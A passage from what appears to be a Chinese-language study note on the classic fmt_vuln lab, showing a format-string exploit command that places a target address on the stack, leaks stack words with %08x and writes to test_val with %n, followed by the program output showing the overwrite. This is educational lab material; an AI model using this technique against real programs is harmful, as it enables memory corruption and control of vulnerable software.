exit(0);
}
我在终端调试 ,本人机器上test_val地址为0x08049858.
./fmt_vuln $(printf "\x58\x98\x04\x08")%08x.%08x.%08x.%n
输出:
The right way to print user-controlled input:
X
The right way to print user-controlled input:
printf "\x58\x98\x04\x08"%08x.%08x.%08x.%x
The wrong way to print user-controlled input:
printf "\x58\x98\x04\x08"bffa27e4.00000000.bffa2960.bffa2c00
test_val @ 0x08049858 = -72 0xffffffb8